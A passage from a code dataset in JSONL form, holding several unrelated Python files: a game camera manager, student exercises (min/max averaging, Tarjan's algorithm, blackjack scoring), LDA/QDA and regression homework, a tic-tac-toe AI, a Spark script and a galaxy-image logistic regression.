Math.Matrix(self.__cam.target)\n return {'targetPos': targetMat.translation,\n 'pivotPos': self.__cam.pivotPosition,\n 'yaw': sourceMat.yaw,\n 'pitch': sourceMat.pitch,\n 'dist': self.__cam.pivotMaxDist,\n 'camConstraints': self.__camConstraints,\n 'pivotDist': self.__getCameraPivotDistance()}\n\n def getCameraPosition(self):\n return self.__cam.position\n\n def updateProjection(self):\n BigWorld.callback(0.0, makeCallbackWeak(self.__updateProjection))\n\n def disableMovementByMouse(self, disable):\n self.__movementDisabled = disable\n\n def __updateProjection(self):\n self.__cam.updateProjection()\n\n def __updateCameraByMouseMove(self, dx, dy, dz):\n if self.__cam is None or self.__movementDisabled:\n return\n elif self.__cam != BigWorld.camera() and not self.__handleInactiveCamera:\n return\n else:\n sourceMat = Math.Matrix(self.__cam.source)\n yaw = sourceMat.yaw\n pitch = sourceMat.pitch\n if dz < 0.0:\n dist = self.__cam.pivotMaxDist\n else:\n dist = self.__cam.targetMaxDist\n currentMatrix = Math.Matrix(self.__cam.invViewMatrix)\n currentYaw = currentMatrix.yaw\n yaw = self.__yawCameraFilter.getNextYaw(currentYaw, yaw, dx)\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n pitch -= dy * cfg['cam_sens']\n dist -= dz * cfg['cam_dist_sens']\n camPitchConstr = self.__camConstraints[0]\n startPitch, endPitch = camPitchConstr\n pitch = mathUtils.clamp(math.radians(startPitch), math.radians(endPitch), pitch)\n distConstr = cfg['preview_cam_dist_constr'] if self.__isPreviewMode else self.__camConstraints[2]\n minDist, maxDist = distConstr\n dist = mathUtils.clamp(minDist, maxDist, dist)\n mat = Math.Matrix()\n mat.setRotateYPR((yaw, pitch, 0.0))\n self.__cam.source = mat\n self.__cam.pivotMaxDist = dist\n self.__cam.movementMode = FAST_CAMERA_MOVEMENT_MODE\n if self.settingsCore.getSetting('dynamicFov') and abs(distConstr[1] - distConstr[0]) > 0.001:\n relativeDist = (dist - distConstr[0]) / (distConstr[1] - distConstr[0])\n _, minFov, maxFov = self.settingsCore.getSetting('fov')\n fov = mathUtils.lerp(minFov, maxFov, relativeDist)\n BigWorld.callback(0, partial(FovExtended.instance().setFovByAbsoluteValue, math.radians(fov), 0.1))\n return\n\n def __setupCamera(self):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n self.__cam = BigWorld.CursorCamera()\n self.__cam.isHangar = True\n self.__cam.spaceID = self.__spaceId\n camDistConstr = cfg['cam_dist_constr']\n minDist, maxDist = camDistConstr\n self.__cam.pivotMaxDist = mathUtils.clamp(minDist, maxDist, cfg['cam_start_dist'])\n self.__cam.pivotMinDist = 0.0\n self.__cam.maxDistHalfLife = cfg['cam_fluency']\n self.__cam.turningHalfLife = cfg['cam_fluency']\n self.__cam.movementHalfLife = cfg['cam_fluency']\n self.__cam.pivotPosition = cfg['cam_pivot_pos']\n self.__camConstraints[0] = cfg['cam_pitch_constr']\n self.__camConstraints[1] = cfg['cam_yaw_constr']\n self.__camConstraints[2] = (0.0, 0.0)\n camYawConstr = self.__camConstraints[1]\n startYaw, endYaw = camYawConstr\n self.__yawCameraFilter = HangarCameraYawFilter(math.radians(startYaw), math.radians(endYaw), cfg['cam_sens'])\n self.__yawCameraFilter.setYawLimits(camYawConstr)\n mat = Math.Matrix()\n yaw = self.__yawCameraFilter.toLimit(math.radians(cfg['cam_start_angles'][0]))\n mat.setRotateYPR((yaw, math.radians(cfg['cam_start_angles'][1]), 0.0))\n self.__cam.source = mat\n mat = Math.Matrix()\n mat.setTranslate(cfg['cam_start_target_pos'])\n self.__cam.target = mat\n self.__cam.forceUpdate()\n BigWorld.camera(self.__cam)\n self.__cameraIdle = HangarCameraIdle(self.__cam)\n self.__cameraParallax = HangarCameraParallax(self.__cam)\n self.__cam.setDynamicCollisions(True)\n\n def __handleMouseEvent(self, event):\n if self.__isMouseDown:\n isGuiVisible = BigWorld.getWatcher('Visibility/GUI')\n if isGuiVisible is not None and isGuiVisible.lower() == 'false':\n self.__updateCameraByMouseMove(event.dx, event.dy, event.dz)\n return True\n return False\n\n def __handleKeyEvent(self, event):\n if event.key == Keys.KEY_LEFTMOUSE:\n self.__isMouseDown = event.isKeyDown()\n\n def __handleLobbyViewMouseEvent(self, event):\n ctx = event.ctx\n self.__updateCameraByMouseMove(ctx['dx'], ctx['dy'], ctx['dz'])\n\n def __handleIdleCameraActivation(self, event):\n if event.ctx['started']:\n self.__cam.pivotMaxDist = self.__getCameraPivotDistance()\n\n def __handleVehicleLoading(self, event):\n ctx = event.ctx\n if self.__currentEntityId != ctx['vEntityId']:\n return\n isDone = not ctx['started']\n self.__cam.isMovementEnabled = isDone\n if isDone:\n self.__updateCameraDistanceLimits()\n self.__cam.pivotMaxDist = self.__getCameraPivotDistance()\n self.__cam.forceUpdate()\n\n def __handleSettingsChange(self, diff):\n if 'fov' in diff:\n _, _, dynamicFOVTop = diff['fov']\n defaultHorizontalFov = math.radians(dynamicFOVTop)\n\n def resetFov(value):\n FovExtended.instance().defaultHorizontalFov = value\n\n BigWorld.callback(0.0, partial(resetFov, defaultHorizontalFov))\n self.__updateCameraByMouseMove(0.0, 0.0, 0.0)\n\n def __handleEntityUpdated(self, event):\n ctx = event.ctx\n if ctx['state'] != CameraMovementStates.FROM_OBJECT:\n self.__currentEntityId = ctx['entityId']\n self.__updateCameraDistanceLimits()\n\n def __handleDisableMovement(self, event):\n self.disableMovementByMouse(event.ctx['disable'])\n\n def __updateCameraDistanceLimits(self):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n entity = BigWorld.entities.get(self.__currentEntityId)\n modelLength = entity.getModelLength() if entity is not None and hasattr(entity, 'getModelLength') else 0.0\n minDist = max(modelLength * cfg['cam_min_dist_vehicle_hull_length_k'], cfg['cam_dist_constr'][0])\n maxDist = entity.cameraMaxDistance if entity is not None and hasattr(entity, 'cameraMaxDistance') else cfg['cam_dist_constr'][1]\n if maxDist < minDist:\n _logger.warning('incorrect values - camera MAX distance < camera MIN distance, use min distance as max')\n maxDist = minDist\n self.__camConstraints[2] = (minDist, maxDist)\n return\n\n def __getCameraPivotDistance(self):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n point1 = self.__cam.target.translation + cfg['cam_pivot_pos']\n point2 = self.__cam.position\n d2 = (point2 - point1).length\n d3 = max(self.__cam.targetMaxDist, d2)\n minDist, maxDist = self.__camConstraints[2]\n return mathUtils.clamp(minDist, maxDist, d3)\n\n @property\n def camera(self):\n return self.__cam\n","sub_path":"source/res/scripts/client/gui/hangar_cameras/hangar_camera_manager.py","file_name":"hangar_camera_manager.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264229093","text":"print('===== MAIORES E MENORES VALORES =====')\nn1 = int(input('Digite um número: '))\npergunta1 = str(input('Você quer continuar? [S / N]> ')).upper()\n\npergunta2 = 'S'\nc = 1\nm = 0\nmaior = n1\nmenor = n1\n\nwhile pergunta2 == 'S':\n n2 = int(input('Digite outro número: '))\n pergunta2 = str(input('Você quer continuar? [S / N]> ')).upper()\n if n1 == 1:\n maior = n1\n menor = n1\n else:\n if n2 > maior:\n maior = n2\n if n2 < menor:\n menor = n2\n n1 += n2\n c += 1\n m = n1 / c\n\nprint('========= MÉDIA =========')\nprint('A média entre todos os valores é {:.2f}'.format(m))\nprint('='*25)\nprint()\nprint('===== MAIOR E MENOR =====')\nprint('O maior número é {} e o menor é {}'.format(maior, menor))\nprint('='*25)\n\n","sub_path":"ProjetosPython/PraticandoPython/P54-MaioreMenorValores.py","file_name":"P54-MaioreMenorValores.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142322535","text":"# Tajan's algorithm\n\ndef read_input():\n n, m = map(int, input().split())\n if n == m == 0:\n return\n adjacent = [[] for i in range(n)]\n for i in range(m):\n u, v, p = map(int, input().split())\n adjacent[u-1].append(v-1)\n if p == 2:\n adjacent[v-1].append(u-1)\n return adjacent, n\n\ndef dfs_tajan(ide, low, stack, onstack, v, d):\n d += 1\n ide[v], low[v] = d, d\n onstack[v] = True\n stack.append(v)\n for u in adjacent[v]:\n if ide[u] == 0:\n dfs_tajan(ide, low, stack, onstack, u, d)\n if onstack[u]:\n low[v] = min(low[u], low[v])\n if low[v] == ide[v]:\n count = 0\n while True:\n w = stack.pop()\n onstack[w] = False\n count += 1\n if w == v:\n break\n if count == n:\n return True\n return False\n\nif __name__ == \"__main__\":\n i = 0\n for adjacent, n in iter(read_input, None):\n ide, low, onstack, stack = [0]*n, [0]*n, [False]*n, []\n boo = dfs_tajan(ide, low, stack, onstack, 0, 0)\n if boo:\n print(1)\n else:\n print(0)\n\n\n\n","sub_path":"Online Judge/11838 - Come and Go.py","file_name":"11838 - Come and Go.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398774694","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.io import loadmat\nfrom numpy.linalg import det, inv\nfrom math import sqrt, pi, exp\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport pickle\nimport sys\nimport math\n\n\ndef ldaLearn(X, y):\n # Inputs\n # X - a N x d matrix with each row corresponding to a training example\n # y - a N x 1 column vector indicating the labels for each training example\n #\n # Outputs\n # means - A d x k matrix containing learnt means for each of the k classes\n # covmat - A single d x d learnt covariance matrix\n\n # IMPLEMENT THIS METHOD\n # Meaan\n # k classes\n k = np.unique(y)\n means = np.zeros([k.shape[0], X.shape[1]])\n Y = y.flatten();\n count = np.zeros([k.shape[0]])\n # Sum of elements of each class\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n index = Y[i] - 1\n means[index][j] = means[index][j] + X[i][j]\n count[index] = count[index] + 1\n # Dividing by count of each class to get mean\n for i in range(k.shape[0]):\n for j in range(X.shape[1]):\n means[i][j] = means[i][j] / count[i]\n means = means.T\n # Covariance\n covmat = np.cov(X, rowvar=0)\n # print (\"LDA mean\", means)\n # print (\"LDA cov\", covmat)\n return means, covmat\n\n\ndef qdaLearn(X, y):\n # Inputs\n # X - a N x d matrix with each row corresponding to a training example\n # y - a N x 1 column vector indicating the labels for each training example\n #\n # Outputs\n # means - A d x k matrix containing learnt means for each of the k classes\n # covmats - A list of k d x d learnt covariance matrices for each of the k classes\n\n # IMPLEMENT THIS METHOD\n k = np.unique(y)\n means = np.zeros([k.shape[0], X.shape[1]])\n Y = y.flatten();\n count = np.zeros([k.shape[0]])\n # Sum of elements of each class\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n index = Y[i] - 1\n means[index][j] = means[index][j] + X[i][j]\n count[index] = count[index] + 1\n # Dividing by count of each class to get mean\n for i in range(k.shape[0]):\n for j in range(X.shape[1]):\n means[i][j] = means[i][j] / count[i]\n means = means.T\n # Covariance\n covmats = [np.zeros((X.shape[1], X.shape[1]))] * k.shape[0]\n for i in range(k.size):\n X_class = X[Y == k[i]]\n covmats[i] = np.cov(X_class, rowvar=0)\n # print covmats\n # print (\"QDA mean\", means)\n return means, covmats\n\n\ndef ldaTest(means, covmat, Xtest, ytest):\n # Inputs\n # means, covmat - parameters of the LDA model\n # Xtest - a N x d matrix with each row corresponding to a test example\n # ytest - a N x 1 column vector indicating the labels for each test example\n # Outputs\n # acc - A scalar accuracy value\n # ypred - N x 1 column vector indicating the predicted labels\n\n # IMPLEMENT THIS METHOD\n means = means.T\n k = np.unique(y)\n Ytest = ytest.flatten()\n ypred = np.zeros([Xtest.shape[0]])\n covmat_det = sqrt(np.linalg.det(covmat))\n covmat_inv = inv(covmat)\n acc = 0\n for a in range(Xtest.shape[0]):\n result = np.zeros([k.shape[0]])\n for i in range(k.shape[0]):\n X_mean = Xtest[a] - means[i]\n epow = -1 / 2 * np.dot(np.dot(X_mean, covmat_inv), X_mean.T)\n result[i] = (1 / (sqrt(2 * pi) * covmat_det)) * (math.exp(epow))\n ypred[a] = float(result.argmax(axis=0) + 1)\n if (ypred[a] == Ytest[a]):\n acc = acc + 1;\n return acc, ypred\n\n\ndef qdaTest(means, covmats, Xtest, ytest):\n # Inputs\n # means, covmats - parameters of the QDA model\n # Xtest - a N x d matrix with each row corresponding to a test example\n # ytest - a N x 1 column vector indicating the labels for each test example\n # Outputs\n # acc - A scalar accuracy value\n # ypred - N x 1 column vector indicating the predicted labels\n\n # IMPLEMENT THIS METHOD\n means = means.T\n k = np.unique(y)\n Ytest = ytest.flatten()\n ypred = np.zeros([Xtest.shape[0]])\n acc = 0\n for a in range(Xtest.shape[0]):\n result = np.zeros([k.shape[0]])\n for i in range(k.shape[0]):\n covmat_det = sqrt(np.linalg.det(covmats[i]))\n covmat_inv = inv(covmats[i])\n X_mean = Xtest[a] - means[i]\n epow = -1 / 2 * np.dot(np.dot(X_mean, covmat_inv), X_mean.T)\n result[i] = (1 / (sqrt(2 * pi) * covmat_det)) * (math.exp(epow))\n ypred[a] = float(result.argmax(axis=0) + 1)\n if (ypred[a] == Ytest[a]):\n acc = acc + 1;\n return acc, ypred\n\n\ndef learnOLERegression(X, y):\n # Inputs:\n # X = N x d\n # y = N x 1\n # Output:\n # w = d x 1\n # From slide\n # IMPLEMENT THIS METHOD\n w = np.dot(inv(np.dot(X.T, X)), np.dot(X.T, y))\n return w\n\n\ndef learnRidgeRegression(X, y, lambd):\n # Inputs:\n # X = N x d\n # y = N x 1\n # lambd = ridge parameter (scalar)\n # Output:\n # w = d x 1\n # From slide\n # IMPLEMENT THIS METHOD\n XT_X = np.dot(X.T, X)\n lambda_mat = lambd * np.identity(XT_X.shape[0])\n w = np.dot(inv((lambda_mat) + XT_X), np.dot(X.T, y))\n return w\n\n\ndef testOLERegression(w, Xtest, ytest):\n # Inputs:\n # w = d x 1\n # Xtest = N x d\n # ytest = X x 1\n # Output:\n # rmse\n\n # IMPLEMENT THIS METHOD\n squ = np.square(ytest - np.dot(Xtest, w))\n rmse = sqrt(np.sum(squ) / Xtest.shape[0])\n return rmse\n\n\ndef regressionObjVal(w, X, y, lambd):\n # compute squared error (scalar) and gradient of squared error with respect\n # to w (vector) for the given data X and y and the regularization parameter\n # lambda\n\n # IMPLEMENT THIS METHOD\n w = np.mat(w)\n w = w.T\n wt_x = np.dot(X, w)\n error = (np.dot((y - wt_x).T, (y - wt_x))) / (2) + (lambd * np.dot(w.T, w) / 2)\n term1 = np.dot(w.T, X.T) - y.T\n # print (\"term1\", term1.shape)\n lambda1 = lambd * w.T\n gradient_des = np.dot(term1, X) + lambda1\n error_grad = np.array(gradient_des).flatten()\n return error, error_grad\n\n\ndef mapNonLinear(x, p):\n # Inputs:\n # x - a single column vector (N x 1)\n # p - integer (>= 0)\n # Outputs:\n # Xd - (N x (d+1))\n # IMPLEMENT THIS METHOD\n Xd = np.zeros([x.shape[0], p + 1])\n for i in range(x.shape[0]):\n for j in range(p + 1):\n Xd[i][j] = np.power(x[i], j)\n return Xd\n\n\n# Main script\n\n# Problem 1\n# load the sample data\nif sys.version_info.major == 2:\n X, y, Xtest, ytest = pickle.load(open('sample.pickle', 'rb'))\nelse:\n X, y, Xtest, ytest = pickle.load(open('sample.pickle', 'rb'), encoding='latin1')\n\n# LDA\nmeans, covmat = ldaLearn(X, y)\nldaacc = ldaTest(means, covmat, Xtest, ytest)\nprint('LDA Accuracy = ' + str(ldaacc))\n# QDA\nmeans, covmats = qdaLearn(X, y)\nqdaacc = qdaTest(means, covmats, Xtest, ytest)\nprint('QDA Accuracy = ' + str(qdaacc))\n\n# plotting boundaries\nx1 = np.linspace(-5, 20, 100)\nx2 = np.linspace(-5, 20, 100)\nxx1, xx2 = np.meshgrid(x1, x2)\nxx = np.zeros((x1.shape[0] * x2.shape[0], 2))\nxx[:, 0] = xx1.ravel()\nxx[:, 1] = xx2.ravel()\n\nzacc, zldares = ldaTest(means, covmat, xx, np.zeros((xx.shape[0], 1)))\nplt.contourf(x1, x2, zldares.reshape((x1.shape[0], x2.shape[0])))\nplt.scatter(Xtest[:, 0], Xtest[:, 1], c=ytest)\nplt.show()\n\nzacc, zqdares = qdaTest(means, covmats, xx, np.zeros((xx.shape[0], 1)))\nplt.contourf(x1, x2, zqdares.reshape((x1.shape[0], x2.shape[0])))\nplt.scatter(Xtest[:, 0], Xtest[:, 1], c=ytest)\nplt.show()\n# Problem 2\n\nif sys.version_info.major == 2:\n X, y, Xtest, ytest = pickle.load(open('diabetes.pickle', 'rb'))\nelse:\n X, y, Xtest, ytest = pickle.load(open('diabetes.pickle', 'rb'), encoding='latin1')\n\n# add intercept\nX_i = np.concatenate((np.ones((X.shape[0], 1)), X), axis=1)\nXtest_i = np.concatenate((np.ones((Xtest.shape[0], 1)), Xtest), axis=1)\n\nw = learnOLERegression(X, y)\nmle = testOLERegression(w, Xtest, ytest)\n# mle = testOLERegression(w, X, y)\nw_i = learnOLERegression(X_i, y)\nmle_i = testOLERegression(w_i, Xtest_i, ytest)\n# mle_i = testOLERegression(w_i, X_i, y)\n\nprint('RMSE without intercept ' + str(mle))\nprint('RMSE with intercept ' + str(mle_i))\n\n# Problem 3\nk = 101\nlambdas = np.linspace(0, 1, num=k)\ni = 0\nrmses3 = np.zeros((k, 1))\nfor lambd in lambdas:\n w_l = learnRidgeRegression(X_i, y, lambd)\n rmses3[i] = testOLERegression(w_l, Xtest_i, ytest)\n # rmses3[i] = testOLERegression(w_l, X_i, y)\n i = i + 1\nplt.plot(lambdas, rmses3)\nplt.show()\n# Problem 4\nk = 101\nlambdas = np.linspace(0, 1, num=k)\ni = 0\nrmses4 = np.zeros((k, 1))\nopts = {'maxiter': 100} # Preferred value.\nw_init = np.ones((X_i.shape[1], 1))\nfor lambd in lambdas:\n args = (X_i, y, lambd)\n w_l = minimize(regressionObjVal, w_init, jac=True, args=args, method='CG', options=opts)\n w_l = np.transpose(np.array(w_l.x))\n w_l = np.reshape(w_l, [len(w_l), 1])\n rmses4[i] = testOLERegression(w_l, Xtest_i, ytest)\n # rmses4[i] = testOLERegression(w_l, X_i, y)\n i = i + 1\nplt.plot(lambdas, rmses4)\nplt.show()\n\n# Problem 5\npmax = 7\nlambda_opt = lambdas[np.argmin(rmses4)]\nrmses5 = np.zeros((pmax, 2))\nfor p in range(pmax):\n Xd = mapNonLinear(X[:, 2], p)\n Xdtest = mapNonLinear(Xtest[:, 2], p)\n w_d1 = learnRidgeRegression(Xd, y, 0)\n rmses5[p, 0] = testOLERegression(w_d1, Xdtest, ytest)\n w_d2 = learnRidgeRegression(Xd, y, lambda_opt)\n rmses5[p, 1] = testOLERegression(w_d2, Xdtest, ytest)\nplt.plot(range(pmax), rmses5)\nplt.legend(('No Regularization', 'Regularization'))\nplt.show()\n","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163475602","text":"from hash_table import HashTable\nimport pytest\n\n\n@pytest.fixture(scope='function')\ndef _small():\n h = HashTable()\n h.set('batman', 'batman')\n h.set('robin', 'robin')\n return h\n\n\ndef test_one(_small):\n x = _small\n assert x.get('batman') == 'batman'\n assert x.get('batman') != 'robin'\n\n\n# def test_dict():\n# x = HashTable()\n# with open(\"/usr/share/dict/words\", \"r\") as afile:\n# for word in afile:\n# word.strip()\n# if not word:\n# break\n# x.set(word, word)\n# assert x.get(word) == word\n\n\ndef test_ordval():\n x = HashTable()\n x.set('this is a really big sentence to break it',\n 'this is a really big sentence to break it')\n assert x.get('this is a really big sentence to break it') == 'this is a really big sentence to break it'\n\n'''Write test that inputs identical keys, with different values\n And check size. To make sure that it doens't just overwrite it.'''\n\n\ndef test_identical():\n x = HashTable()\n x.set('vortex', 'vortex')\n x.set('peter', 'peter')\n x.set('vortex', 'vortex')\n assert x.get('vortex') == 'vortex' \n","sub_path":"test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186657576","text":"\r\nfrom player import Player\r\nimport copy\r\nimport random\r\nimport math\r\n\r\nclass AI(Player):\r\n def __init__(self, name, symbol):\r\n #Borrows parent co-efficients\r\n Player.__init__(self, name, symbol)\r\n #initilise intelligence co-efficients\r\n self.co1 = 24\r\n self.co2 = 16\r\n self.co3 = 7\r\n self.co4 = 10\r\n self.co5 = 10\r\n if self.symbol == 'X':\r\n self.opponent = 'O'\r\n else:\r\n self.opponent = 'X'\r\n\r\n def turn(self, game):\r\n #intilise variables\r\n self.position_type = {}\r\n self.position_points = {}\r\n self.points_tally = {}\r\n for i in range(1,game.length**2+1):\r\n self.position_type[i] = [0,0]\r\n self.position_points[i] = [0,0,0] #[attack,defend,neutral]\r\n self.points_tally[i] = 0\r\n #thinks about all possible moves, adding points for all squares\r\n\r\n self.count_points(game)\r\n #decides the best turn and makes it\r\n for position in range(1,game.length**2+1):\r\n #check special condition - attacking from corners is especially good if piece in \r\n if game.length == 3:\r\n if set([2,4,6,8]).issubset(game.remaining) and position in [1,3,7,9]:\r\n #defending on corners is especially bad if enemy controls other corners\r\n if self.symbol not in [game.board[0][0], game.board[0][2], game.board[2][0], game.board[2][2]]\\\r\n and self.opponent in [game.board[0][0], game.board[0][2], game.board[2][0], game.board[2][2]]:\r\n self.position_points[position][1] /= 8 \r\n #defending corner forks on corners is especially bad\r\n\r\n\r\n #Compute all other points through the elementwise vector multiplication\r\n self.points_tally[position] += self.position_points[position][0]*((self.position_type[position][0]**2))\\\r\n + self.position_points[position][1]*((self.position_type[position][1]**2))\r\n \r\n highest_val = 0\r\n highest_pos = 0\r\n\r\n for key in self.points_tally:\r\n if self.points_tally[key] > highest_val:\r\n highest_val = self.points_tally[key]\r\n highest_pos = key\r\n\r\n if highest_pos == 0:\r\n highest_pos = game.remaining[0]\r\n\r\n\r\n self.replace(game, game.position_dict[highest_pos])\r\n game.remaining.remove(highest_pos)\r\n \r\n\r\n def count_points(self, game):\r\n if self.symbol == 'O':\r\n index = 1\r\n else:\r\n index = 0\r\n #counts the points in each row, column and diagonal\r\n checklist = []\r\n \r\n for i in range(1, game.length+1):\r\n checklist.append(game.pos_in_row(i))\r\n checklist.append(game.pos_in_col(i))\r\n checklist.append(game.pos_in_dia(0))\r\n checklist.append(game.pos_in_dia(1))\r\n\r\n for major_row in checklist:\r\n for row in major_row:\r\n row_tally = game.count_row(row)\r\n if len(game.remaining) == game.length**2 and game.length == 3:\r\n self.points_tally[1] += 1000000000\r\n \r\n for position in row:\r\n if position in game.remaining:\r\n \r\n #condition 0.1: Imminent victory\r\n if row_tally[self.symbol] == game.win_con-1 and row_tally[self.opponent] == 0 and game.learning == 0:\r\n self.points_tally[position] += 1000000000**2\r\n elif row_tally[self.symbol] == game.win_con-2 and row_tally[self.opponent] == 0 and game.learning == 0:\r\n self.points_tally[position] += 10000000**2\r\n\r\n #condition 0.2: Imminent defeat\r\n elif row_tally[self.opponent] == game.win_con-1 and row_tally[self.symbol] == 0 and game.learning == 0:\r\n self.points_tally[position] += 100000000**2\r\n elif row_tally[self.opponent] == game.win_con-2 and row_tally[self.symbol] == 0 and game.learning == 0:\r\n self.points_tally[position] += 1000000**2\r\n\r\n\r\n #condition 2: blank row\r\n elif row_tally[self.symbol] + row_tally[self.opponent] == 0:\r\n self.points_tally[position] += self.co1\r\n \r\n\r\n #condition 1: Attacking row\r\n elif row_tally[self.opponent] == 0:\r\n self.position_type[position][int(math.fabs(index-1))] += 1 \r\n self.position_points[position][int(math.fabs(index-1))] += self.co2+row_tally[self.symbol]*self.co4\r\n \r\n \r\n\r\n #condition 3: Defending row\r\n elif row_tally[self.symbol] == 0:\r\n self.position_type[position][index] += 1\r\n self.position_points[position][index] += self.co3+row_tally[self.opponent]*self.co5\r\n \r\n def switch(self, other):\r\n self.co1 = copy.copy(other.co1)\r\n self.co2 = copy.copy(other.co2)\r\n self.co3 = copy.copy(other.co3)\r\n self.co4 = copy.copy(other.co4)\r\n self.co5 = copy.copy(other.co5)\r\n\r\n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383657107","text":"hand = str(input(\"Enter hand: \")).upper()\nscore = 0\n\naces = 0\nfor card in hand:\n if card in [\"T\", \"J\", \"Q\", \"K\"]:\n score += 10\n continue\n if card == \"A\":\n aces += 1\n continue\n score += int(card)\n\nfor x in range(aces):\n if score+11 <= 21:\n score += 11\n else:\n score += 1\n\nprint(score)\n","sub_path":"Python/Lab 5/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591381002","text":"import sys\nimport json\nfrom pyspark import SparkContext\n\n\ndef collect_output_data(sc):\n data = sc.textFile(sys.argv[1]).map(lambda row: json.loads(row)).map(lambda row: row['retweet_count'])\n output_json['mean_retweet'] = data.mean()\n output_json['max_retweet'] = data.max()\n output_json['stdev_retweet'] = data.stdev()\n\n\ndef dump_output_data():\n with open(sys.argv[2], 'wt', encoding='utf-8') as file:\n json.dump(output_json, file, indent=1, ensure_ascii=False)\n\n\ndef main():\n sc = SparkContext(\"local[*]\", \"DS 553 HW1\")\n sc.setLogLevel('OFF') # Limits the output to be printed\n\n # start = time() # Starts the timer to see the response time\n collect_output_data(sc)\n # print(f'Elapsed Time: {time() - start}') # Prints the time taken to finish task 1\n\n dump_output_data()\n\n sc.stop()\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Incorrect number of command line arguments passed\")\n print(\"Usage: python firstname_lastname_task2.py input_file_path output_file_path\")\n exit(1)\n output_json = {}\n main()\n","sub_path":"HW1/vishal_kallem_task2.py","file_name":"vishal_kallem_task2.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345738372","text":"############################################\n# #\n# LOGISTIC REGRESSION FOR SPIRAL GALAXIES #\n# #\n############################################\n\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import check_random_state\nimport seaborn as sns\nfrom sklearn import metrics\n\nprint(__doc__)\n\n# Turn down for faster convergence\nt0 = time.time()\ntrain_size = 0.8\ntest_size = 0.2\nprint(\"Training fraction: {}\\n\".format(train_size))\n\n### load galaxy data from spiral_images/ \nX_in = np.load('spiral_images/images1.npy')\ny = np.load('spiral_images/bin_labels.npy')\nchunk = 4\nimgsInChunk = X_in.shape[0]\nprint(\"Processing chunk {} containing {} pictures...\\n\".format(chunk, imgsInChunk))\n\nimgStart = chunk * imgsInChunk\nimgEnd = imgStart + imgsInChunk\ny = y[imgStart : imgEnd]\n\n# for shuffling data in a reproducable manner\nrandom_state = 1\n\n# pick training and test data sets \nX_train_in, X_test_in, y_train, y_test = train_test_split(X_in,y,train_size=train_size,test_size\n =test_size, random_state = random_state)\n\n# We need to split the uploaded X_in arrays into the galaxy ID vector and the image data\nid_train = X_train_in[:,0]\nX_train = X_train_in[:,1:]\nid_test = X_test_in[:,0]\nX_test = X_test_in[:,1:]\nprint(\"The training data has {} samples of {} features each. \\n\".format(X_train.shape[0], X_train.shape[1]))\n\n# scale data to have zero mean and unit variance [required by regressor]\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n# apply logistic regressor with 'sag' solver, C is the inverse regularization strength\nclf = LogisticRegression(C=1e5,\n multi_class='multinomial',\n penalty='l2', solver='sag', tol=0.1)\n# fit data\nclf.fit(X_train, y_train)\n# percentage of nonzero weights\nsparsity = np.mean(clf.coef_ == 0) * 100\n# compute accuracy\nscore = clf.score(X_test, y_test)\n\n#display run time\nrun_time = time.time() - t0\nprint('Example run in %.3f s' % run_time)\n\nprint(\"Sparsity with L2 penalty: %.2f%%\" % sparsity)\nprint(\"Test score with L2 penalty: %.4f\" % score)\n\n\n#######################################################################################################\n\npredictions = clf.predict(X_test)\n\n\n# plot weights vs the pixel position\ncoef = clf.coef_.copy()\nplt.figure(figsize=(10, 5))\nscale = np.abs(coef).max()\nfor i in range(1):\n l2_plot = plt.subplot(1,1,i+1)\n im = l2_plot.imshow(coef[i].reshape(45, 45), interpolation='nearest',\n cmap=plt.cm.Greys, vmin=-scale, vmax=scale)\n l2_plot.set_xticks(())\n l2_plot.set_yticks(())\n cbar = plt.colorbar(im)\nplt.suptitle('classification weights for spiral pattern')\n\nplt.show()\n\n# plot confusion matrix\ncm = metrics.confusion_matrix(y_test, predictions)\nprint(cm)\n\n# first alternative\nplt.figure(figsize=(9,9))\nplt.imshow(cm, interpolation='nearest', cmap='Pastel1')\nplt.title('Confusion matrix', size = 20)\nplt.colorbar()\ntick_marks = np.arange(2)\nplt.xticks(tick_marks, [\"spiral\", \"no spiral\"], size = 12)\nplt.yticks(tick_marks, [\"spiral\", \"no spiral\"], size = 12)\nplt.tight_layout()\nplt.ylabel('Actual label', size = 18)\nplt.xlabel('Predicted label', size = 18)\nwidth, height = cm.shape\nfor x in range(width):\n for y in range(height):\n plt.annotate(str(cm[x][y]), xy=(y, x), \n horizontalalignment='center',\n verticalalignment='center')\n \n# second alternative\nplt.figure(figsize=(9,9))\nsns.heatmap(cm, annot=True, fmt=\".0f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted 